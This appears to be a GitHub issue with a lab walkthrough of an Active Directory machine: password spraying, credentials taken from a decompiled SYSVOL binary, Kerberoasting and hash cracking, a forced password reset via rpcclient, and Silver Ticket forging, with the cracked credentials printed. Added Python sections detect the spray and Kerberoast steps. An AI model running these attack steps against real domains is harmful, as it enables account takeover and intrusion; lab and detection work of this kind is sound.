Open WDavid404 opened 3 months ago
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-11 05:49:11Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| DNS_Domain_Name: nagoya-industries.com
| DNS_Computer_Name: nagoya.nagoya-industries.com
| DNS_Tree_Name: nagoya-industries.com
| Product_Version: 10.0.17763
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49693/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49708/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
--> no info
--> no info
ldapsearch -H ldap://192.168.208.21 -x -s base namingcontexts
-->
dn:
namingcontexts: DC=nagoya-industries,DC=com
namingcontexts: CN=Configuration,DC=nagoya-industries,DC=com
namingcontexts: CN=Schema,CN=Configuration,DC=nagoya-industries,DC=com
namingcontexts: DC=DomainDnsZones,DC=nagoya-industries,DC=com
namingcontexts: DC=ForestDnsZones,DC=nagoya-industries,DC=com
ldapsearch -H ldap://192.168.208.21 -x -b "DC=nagoya-industries,DC=com"
--> no info
/team --> got a list of names --> made a username list (userlist.txt) that looks like the one below
/error
crackmapexec smb $IP -u userlist.txt -p /usr/share/wordlists/rockyou.txt
--> no result
Guessed that a password is Summer2023 --> Reason: a wild guess, since the Nagoya machine was released in summer 2023.
crackmapexec smb 192.168.165.21 -u user.txt -p Summer2023
-->
Fiona.clark
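The crackmapexec run above is a password spray: one password tried against every name in the list. As an added example (not part of the original issue), the Python below shows what that looks like from the domain controller's side and how to flag it: a burst of failed logons from one source, each for a different account, followed by one success for the account that matched. The event records, source IPs, account names other than fiona.clark, and the thresholds are all constructed for the example.

```python
"""Password-spray detection over constructed domain-controller logon events.

Added example, not part of the original issue. The crackmapexec run above
tries one password against every name in the user list; on the domain
controller that shows up as a burst of failed Kerberos pre-authentication
(4771) or logon (4625) events from a single source, each naming a different
account, followed by one success (4624/4768) for the account that matched.
The events, IPs and thresholds below are constructed for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: (timestamp, event_id, account, source_ip).
# 4771 = Kerberos pre-auth failed, 4768 = TGT issued, 4625 = logon failure.
SAMPLE_EVENTS = [
    ("2024-08-11T05:50:01", 4771, "jack.chen",    "192.168.45.200"),
    ("2024-08-11T05:50:02", 4771, "sarah.white",  "192.168.45.200"),
    ("2024-08-11T05:50:02", 4771, "leonard.hart", "192.168.45.200"),
    ("2024-08-11T05:50:03", 4771, "eric.stone",   "192.168.45.200"),
    ("2024-08-11T05:50:03", 4771, "amy.gordon",   "192.168.45.200"),
    ("2024-08-11T05:50:04", 4768, "fiona.clark",  "192.168.45.200"),
    ("2024-08-11T05:50:04", 4771, "brian.ross",   "192.168.45.200"),
    # A user mistyping their own password twice is not a spray.
    ("2024-08-11T06:10:00", 4625, "jack.chen",    "10.10.10.5"),
    ("2024-08-11T06:10:09", 4625, "jack.chen",    "10.10.10.5"),
]

FAILURE_IDS = {4625, 4771}
SUCCESS_IDS = {4624, 4768}


def detect_password_spray(events, window=timedelta(seconds=60), min_accounts=5):
    """Return {source_ip: {"accounts": [...], "succeeded": [...]}} for every
    source that produced failures for at least `min_accounts` distinct
    accounts inside a single `window`, plus any accounts that source then
    authenticated successfully (the password that "stuck")."""
    failures = defaultdict(list)
    successes = defaultdict(set)
    for ts, event_id, account, src in events:
        when = datetime.fromisoformat(ts)
        if event_id in FAILURE_IDS:
            failures[src].append((when, account.lower()))
        elif event_id in SUCCESS_IDS:
            successes[src].add(account.lower())

    hits = {}
    for src, items in failures.items():
        items.sort()
        left = 0
        flagged = set()
        for right, (when, _) in enumerate(items):
            # Slide the left edge so items[left:right+1] spans at most `window`.
            while when - items[left][0] > window:
                left += 1
            accounts = {acct for _, acct in items[left:right + 1]}
            if len(accounts) >= min_accounts:
                flagged |= accounts
        if flagged:
            hits[src] = {
                "accounts": sorted(flagged),
                "succeeded": sorted(successes.get(src, ())),
            }
    return hits


if __name__ == "__main__":
    for src, info in detect_password_spray(SAMPLE_EVENTS).items():
        print(f"spray from {src}: {len(info['accounts'])} accounts tried, "
              f"succeeded for {info['succeeded'] or 'none'}")
```

The "succeeded" list is the part worth alerting on: a source that fails for many accounts and then gets a TGT for one of them has found a valid password. Tune `window` and `min_accounts` to the environment; lockout thresholds and a seasonal-password ban (Summer2023-style passwords are exactly what sprays try first) are the mitigations.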
smbclient -U 'Fiona.clark' //192.168.218.21/SYSVOL
Found "\nagoya-industries.com\scripts\ResetPassword\ResetPassword.exe" file
strings ResetPassword.exe
--> didn't find interesting info
On Kali, install the ILSpy plugin for Visual Studio Code (click on Extensions and search for ILSpy). --> svc_helpdesk:U299iYRmikYTHDbPbxPoYYfa2j4x4cdg
impacket-GetUserSPNs -request nagoya-industries.com/fiona.clark:'Summer2023' -dc-ip 192.168.218.21
--> found a username (svc_mssql) and its hash:
$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_mssql*$24ea48f39707997f007ceb4f3bc3124b$cd6271cfe64.......
Crack the hash above:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
--> svc_mssql:Service1
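Two things a defender wants from the GetUserSPNs step above: to read what the `$krb5tgs$` line actually says (which account, realm, SPN and encryption type), and to recognise the same request in the domain controller's logs. The Python below is an added example, not code from the original issue or from impacket. The hash header is the one from the issue with a constructed encrypted-data tail; the 4769 records, client IPs and account names other than those on the page are constructed.

```python
"""Reading a Kerberoast hash and spotting the request in DC logs.

Added example, not part of the original issue. (1) Parse the $krb5tgs$ line
to see which account, realm, SPN and encryption type it covers: etype 23
(RC4-HMAC) keys are simply the account's NT hash and crack far faster than
AES types 17/18. (2) Recognise the request on the domain controller, where
it appears as event 4769 (service ticket requested) with
TicketEncryptionType 0x17 for a user (not machine) service account.
The 4769 records, client IPs and the hash tail are constructed.
"""
import re

# Layout of the etype-23 line as GetUserSPNs prints it:
# $krb5tgs$23$*user$REALM$spn*$checksum(16 bytes)$encrypted-ticket-part
_KRB5TGS_RC4 = re.compile(
    r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-fA-F]{32})\$([0-9a-fA-F]+)$")

ETYPE_NAMES = {0x17: "rc4-hmac (key = NT hash)", 0x11: "aes128-cts-hmac-sha1-96",
               0x12: "aes256-cts-hmac-sha1-96"}

# Header from the issue; the encrypted part after the checksum is constructed.
SAMPLE_HASH = ("$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_mssql*"
               "$24ea48f39707997f007ceb4f3bc3124b$" + "00" * 48)


def parse_krb5tgs(line):
    """Split an etype-23 $krb5tgs$ line into its fields, or raise ValueError."""
    m = _KRB5TGS_RC4.match(line.strip())
    if not m:
        raise ValueError("not an RC4 $krb5tgs$ line")
    user, realm, spn, checksum, edata = m.groups()
    return {"etype": 23, "etype_name": ETYPE_NAMES[0x17], "user": user, "realm": realm,
            "spn": spn, "checksum": checksum.lower(), "edata_bytes": len(edata) // 2}


# Constructed 4769 records: Account Name, Service Name, Ticket Encryption Type, Client Address.
SAMPLE_4769 = [
    {"account": "fiona.clark",  "service": "svc_mssql", "etype": "0x17", "client": "192.168.45.200"},
    {"account": "fiona.clark",  "service": "NAGOYA$",   "etype": "0x12", "client": "192.168.45.200"},
    {"account": "NAGOYA$",      "service": "krbtgt",    "etype": "0x12", "client": "192.168.208.21"},
    {"account": "svc_helpdesk", "service": "svc_mssql", "etype": "0x12", "client": "192.168.208.30"},
]


def flag_kerberoast(events):
    """Return the 4769 records that look like Kerberoasting: an RC4 (0x17)
    service ticket for a user service account. Machine accounts end in '$'
    and krbtgt is the TGT service, so both are excluded. This misses a
    requester that asks for AES tickets; pair it with a per-client count of
    distinct SPNs requested in a short window."""
    hits = []
    for rec in events:
        service = rec["service"]
        if (int(rec["etype"], 16) == 0x17 and not service.endswith("$")
                and service.lower() != "krbtgt"):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    info = parse_krb5tgs(SAMPLE_HASH)
    print(f"{info['user']}@{info['realm']} spn={info['spn']} etype={info['etype_name']}")
    for rec in flag_kerberoast(SAMPLE_4769):
        print(f"possible kerberoast: {rec['account']} from {rec['client']} -> {rec['service']} (RC4)")
```

The mitigation the hash itself points at: a service account whose password is in rockyou.txt (Service1) and whose tickets are still issued with RC4. Long random passwords or a gMSA for SPN-bearing accounts, and AES-only ("This account supports Kerberos AES") on them, remove both halves of that.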
evil-winrm -i 192.168.218.21 -u svc_mssql -p 'Service1'
evil-winrm -i 192.168.218.21 -u svc_helpdesk -p 'U299iYRmikYTHDbPbxPoYYfa2j4x4cdg'
--> all failed
rpcclient -U nagoya-industries/svc_helpdesk 192.168.218.21
Refer to the rpcclient commands (https://book.hacktricks.xyz/v/jp/network-services-pentesting/pentesting-smb/rpcclient-enumeration)
Found that Christopher.Lewis (rid:[0x46c]) is in 3 groups while the others are only in 2 --> the extra one is group:[developers] rid:[0x46a]
Note: In the rpcclient tool, the setuserinfo function is used to modify user account information on a remote Windows system.
setuserinfo christopher.lewis 23 'Pass123!'
evil-winrm -i 192.168.218.21 -u christopher.lewis -p 'Pass123!'
svc_mssql is a service account and we found a folder at c:\user\svc_mssql. As we discovered the svc_mssql account but never saw port 1433 open during the nmap scan, we decided to check whether it runs locally via netstat. --> no 1433 port
mimikatz.exe didn't work.
To create a Silver Ticket, we need:
Generate NTLM with "Service1" (https://www.browserling.com/tools/all-hashes) --> E3A0168BC21CFB88B95C954A5B18F57C
Get-ADdomain
Get-ADUser -Filter {SamAccountName -eq "svc_mssql"} -Properties ServicePrincipalNames
On kali, impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com -user-id 500 Administrator
Export the variable
export KRB5CCNAME=$PWD/Administrator.ccache
impacket-mssqlclient nagoya-industries.com/svc_mssql:Service1@192.168.218.21 -windows-auth
--> doesn't work because port 1433/tcp isn't open!
Port 1433/tcp isn't open locally either, so I cannot go ahead....
Keypoints: